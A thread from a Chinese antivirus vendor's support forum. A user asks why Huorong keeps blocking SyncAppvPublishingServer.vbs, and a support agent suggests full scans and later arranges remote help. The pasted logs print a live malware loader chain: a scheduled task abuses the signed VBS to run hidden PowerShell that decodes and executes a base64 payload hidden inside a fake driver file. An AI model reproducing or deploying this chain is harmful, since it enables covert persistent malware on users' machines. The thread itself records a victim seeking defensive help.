有香味的鱼 发表于 2024-4-20 13:45:39

求助,SyncAppvPublishingServer.vbs触犯敏感动作防护规则,怎么办

【3】2024-04-20 11:36:00,系统防护,系统加固,SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止

防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = ::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServern; $sc = ::UTF8.GetString(::ReadAllBytes('C:\Windows\System32\drivers\{A08AFAE3-18AE-4555-80D6-1B85BEE756F9}.sys'), 1817026, 1274); $sc2 = ::FromBase64String($sc); $sc3 = ::UTF8.GetString($sc2); Invoke-Command (::Create($sc3))}
操作结果:已阻止

进程ID:3296
操作进程:C:\Windows\System32\SyncAppvPublishingServer.vbs
操作进程命令行:C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" n; $sc = ::UTF8.GetString(::ReadAllBytes('C:\Windows\System32\drivers\{A08AFAE3-18AE-4555-80D6-1B85BEE756F9}.sys'), 1817026, 1274); $sc2 = ::FromBase64String($sc); $sc3 = ::UTF8.GetString($sc2); Invoke-Command (::Create($sc3))
操作进程校验和:0FEB54C3151B018BFEB244255009D71A37DF544F
父进程ID:1784
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2024-04-20 11:36:00,系统防护,系统加固,SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止

防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = ::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServern; $sc = ::UTF8.GetString(::ReadAllBytes('C:\Windows\System32\drivers\{9EFFF019-D851-42D0-92F6-546312B5598B}.sys'), 1817026, 1274); $sc2 = ::FromBase64String($sc); $sc3 = ::UTF8.GetString($sc2); Invoke-Command (::Create($sc3))}
操作结果:已阻止

进程ID:5736
操作进程:C:\Windows\System32\SyncAppvPublishingServer.vbs
操作进程命令行:C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" n; $sc = ::UTF8.GetString(::ReadAllBytes('C:\Windows\System32\drivers\{9EFFF019-D851-42D0-92F6-546312B5598B}.sys'), 1817026, 1274); $sc2 = ::FromBase64String($sc); $sc3 = ::UTF8.GetString($sc2); Invoke-Command (::Create($sc3))
操作进程校验和:0FEB54C3151B018BFEB244255009D71A37DF544F
父进程ID:1784
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

火绒运营专员 发表于 2024-4-20 13:47:38

您好,您清空火绒信任区全盘查杀+专杀工具扫一遍后重启电脑,若未解决您及时联系

有香味的鱼 发表于 2024-4-21 12:18:39

火绒运营专员 发表于 2024-4-20 13:47
您好,您清空火绒信任区全盘查杀+专杀工具扫一遍后重启电脑,若未解决您及时联系 ...

试过了,仍然没效果,qq号985533354

火绒运营专员 发表于 2024-4-21 12:43:10

有香味的鱼 发表于 2024-4-21 12:18
试过了,仍然没效果,qq号985533354

您好,已向您发送好友申请,麻烦您留意一下

火绒运营专员 发表于 2024-4-29 14:02:00

您好,您的问题工程师远程给您处理,感谢您的反馈。
页: [1]
查看完整版本: 求助,SyncAppvPublishingServer.vbs触犯敏感动作防护规则,怎么办